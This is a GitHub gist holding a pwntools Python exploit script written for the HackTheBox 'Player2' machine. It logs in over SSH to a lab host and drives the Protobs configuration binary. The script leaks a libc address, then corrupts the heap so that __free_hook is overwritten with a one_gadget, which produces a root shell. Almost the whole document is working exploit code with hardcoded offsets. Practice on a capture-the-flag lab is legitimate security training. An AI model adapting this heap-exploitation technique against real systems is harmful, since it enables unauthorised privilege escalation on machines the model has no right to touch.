Skip to content

Instantly share code, notes, and snippets.

@xct

xct/protobs.py Secret

Created Jun 27, 2020
Embed
What would you like to do?
HackTheBox Player2 Root Exploit
#!/usr/bin/python
from pwn import *
import random
import string
import time
# Author: xct
def create_config(p, name='xct', desc_size=0, desc=''):
p.recvuntil('protobs@player2:~$')
p.sendline('2')
p.recvuntil(']:')
p.sendline(name)
p.recvuntil(']:')
p.sendline('')
p.recvuntil(']:')
p.sendline('')
p.recvuntil(']:')
p.sendline('')
p.recvuntil(']:')
p.sendline('')
p.recvuntil(']:')
p.sendline('')
p.recvuntil(']:')
p.sendline(str(desc_size))
p.recvuntil(']:')
p.send(desc)
def delete_config(p, index):
p.recvuntil('protobs@player2:~$')
p.sendline('4')
p.recvuntil(']:')
p.sendline(str(index))
def read_config(p, index):
p.recvuntil('protobs@player2:~$')
p.sendline('3')
p.recvuntil(']:')
p.sendline(str(index))
context.arch = 'amd64'
context.log_level = 'debug'
libc = ELF('./libc.so.6')
main = ELF('./Protobs')
BASE_OFFSET = 0x1EB9a8 # this changes slightly, was 0x1EB998
FREE_HOOK = 0x1E75A8 # print &__free_hook
ONE_GADGET = 0xe2383
s = ssh(host='10.10.10.170', user='observer', keyfile='observer.key')
p = s.run('/opt/Configuration_Utility/Protobs')
create_config(p, desc_size=72, desc='A'*64)
read_config(p, 0)
p.recvuntil("A"*(64))
leak = p.recvline()[:-1]
leak += b"\x00\x00"
leak = u64(leak)
base = leak-BASE_OFFSET
log.success('Leak: ' +hex(leak))
log.success('Libc-Base: '+hex(base))
idx = 1
create_config(p, desc_size=0x68, name='BBBB', desc='B'*(0x68)) #1
create_config(p, desc_size=0x68, name='CCCC', desc='C'*(0x68)) #2
create_config(p, desc_size=0x38, name='DDDD', desc='D'*(0x38)) #3
create_config(p, desc_size=0x20, name='ZZZZ', desc='Z'*(0x20)) #4
delete_config(p, idx+2)
delete_config(p, idx+1)
create_config(p, desc_size=0x68, name=b'M'*0x68+b'N'*8+p64(base+FREE_HOOK), desc=b'P'*(0x20))
create_config(p, desc_size=0x38, name=p64(0xcafebabe), desc=p64(base+ONE_GADGET))
delete_config(p, 0)
p.interactive()
p.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.